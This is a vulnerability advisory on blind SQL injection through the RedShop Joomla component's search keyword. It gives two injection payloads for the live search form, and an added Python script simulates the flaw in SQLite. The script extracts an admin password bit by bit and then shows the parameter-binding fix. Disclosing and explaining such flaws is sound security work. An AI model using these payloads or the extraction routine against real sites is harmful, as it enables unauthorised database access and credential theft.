RedShop 1.0.23.1 Joomla Component Blind SQL Injection Vulnerability

Name               RedShop
Vendor             http://redweb.dk
Versions Affected  1.0.23.1

Author             Salvatore Fresta aka Drosophila
Website            http://www.salvatorefresta.net
Contact            salvatorefresta [at] gmail [dot] com
Date               2010-07-13

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX


I. ABOUT THE APPLICATION
________________________

RedShop is a popular commercial Joomla component. It is a
Content Creation Kit style webshop tool that gives the user
more freedom than any other to completely style and change
their webshop, without much more knowledge than HTML and a
bit of CSS.


II. DESCRIPTION
_______________

A parameter in the search form is not properly sanitised
before being used in a SQL query.


III. ANALYSIS
_____________

Summary:

A) Blind SQL Injection


A) Blind SQL Injection
______________________

The parameter keyword is not properly sanitised before
being used in a SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
The injection is blind: the application returns neither
the query's error messages nor the injected data, so the
attacker has to infer one bit per request from whether the
search returns results or not.

Successful exploitation requires that "magic_quotes_gpc"
is disabled, because the payload has to close the string
literal with an unescaped single quote.


IV. SAMPLE CODE
_______________

A) Blind SQL Injection

Copy and paste the following lines in the search form:

' AND (SELECT(IF(ASCII(0x41) = 64,false,NULL))) OR '
' AND (SELECT(IF(ASCII(0x41) = 65,true,NULL))) OR '

MySQL treats the hex literal 0x41 as the string 'A', so
ASCII(0x41) is 65: the first line injects a NULL condition
and the second a true one. The two responses differ, and
that difference is the oracle. Replacing ASCII(0x41) = 65
with any other condition (for example a comparison against
one character of a column value) lets that condition be
tested one bit per request.

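The technique above, worked through end to end as an added example (this is not code from RedShop or from the advisory). It simulates the reported pattern in SQLite: a search keyword concatenated into a LIKE clause, a yes/no oracle built from "did the search return rows", the advisory's two-probe confirmation, character-by-character extraction through that oracle, and the bound-parameter form that closes the hole. Table and column names (jos_redshop_product, jos_users) and the sample rows are constructed; the payloads keep the advisory's ' AND (...) OR ' shape, but the inner condition uses SQLite's UNICODE/SUBSTR in place of MySQL's ASCII/IF so the script runs on Python's bundled sqlite3 module.

```python
"""Boolean-blind SQL injection through a search keyword, simulated in SQLite.

Added example, not code from RedShop or the advisory.  Schema, rows and
function names are constructed; payloads are adapted from MySQL to SQLite.
"""
from __future__ import annotations

import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory database holding constructed sample data."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE jos_redshop_product (product_name TEXT);
        INSERT INTO jos_redshop_product VALUES ('Red Shirt'), ('Blue Mug');
        CREATE TABLE jos_users (username TEXT, password TEXT);
        INSERT INTO jos_users VALUES ('admin', 'S3cret!');
    """)
    return con


def search_vulnerable(con: sqlite3.Connection, keyword: str) -> list[str]:
    """Keyword concatenated straight into the query (the reported defect class)."""
    sql = ("SELECT product_name FROM jos_redshop_product "
           "WHERE product_name LIKE '%" + keyword + "%'")
    return [row[0] for row in con.execute(sql)]


def search_fixed(con: sqlite3.Connection, keyword: str) -> list[str]:
    """Keyword passed as a bound parameter: it can only ever be pattern data."""
    sql = "SELECT product_name FROM jos_redshop_product WHERE product_name LIKE ?"
    return [row[0] for row in con.execute(sql, ("%" + keyword + "%",))]


def oracle(search, con: sqlite3.Connection, condition: str) -> bool:
    """Return True when the SQL boolean `condition` holds on the target.

    Injected, the WHERE clause reads:  ... LIKE '%' AND (condition) OR '%'
    LIKE '%' matches every row and the string '%' is false, so rows come
    back exactly when `condition` is true; false or NULL yields no rows.
    """
    payload = "' AND (" + condition + ") OR '"
    return len(search(con, payload)) > 0


def confirm_injection(search, con: sqlite3.Connection) -> bool:
    """The advisory's two-probe check: a known-false and a known-true
    condition must give different responses (UNICODE('A') is 65, as
    ASCII(0x41) is in MySQL)."""
    return (oracle(search, con, "UNICODE('A') = 64") is False
            and oracle(search, con, "UNICODE('A') = 65") is True)


def extract(search, con: sqlite3.Connection, expr: str, max_len: int = 64) -> str:
    """Recover the string value of the SQL scalar `expr` one character at a
    time, binary-searching each code point over 0..127 (7 requests per
    character plus one length check per position)."""
    out = ""
    for i in range(1, max_len + 1):
        if not oracle(search, con, f"LENGTH(({expr})) >= {i}"):
            break  # past the end of the value
        char = f"UNICODE(SUBSTR(({expr}), {i}, 1))"
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(search, con, f"{char} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = build_db()
    secret = "SELECT password FROM jos_users WHERE username = 'admin'"
    print("vulnerable endpoint, oracle confirmed:", confirm_injection(search_vulnerable, db))
    print("vulnerable endpoint, extracted:", extract(search_vulnerable, db, secret))
    print("fixed endpoint, oracle confirmed:", confirm_injection(search_fixed, db))
    print("fixed endpoint, extracted:", repr(extract(search_fixed, db, secret)))
```

Against search_vulnerable the two probes disagree and the admin password is recovered in 7 requests per character; against search_fixed the same payload is just a LIKE pattern that matches no product, so both probes return no rows and extract() gives an empty string. Note that the fix works whatever the magic_quotes_gpc setting, which is the property the original component lacked.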
V. FIX
______

No fix was available at the time of writing. Passing the
keyword to the database as a bound query parameter, rather
than concatenating it into the SQL string, removes the
injection regardless of the magic_quotes_gpc setting.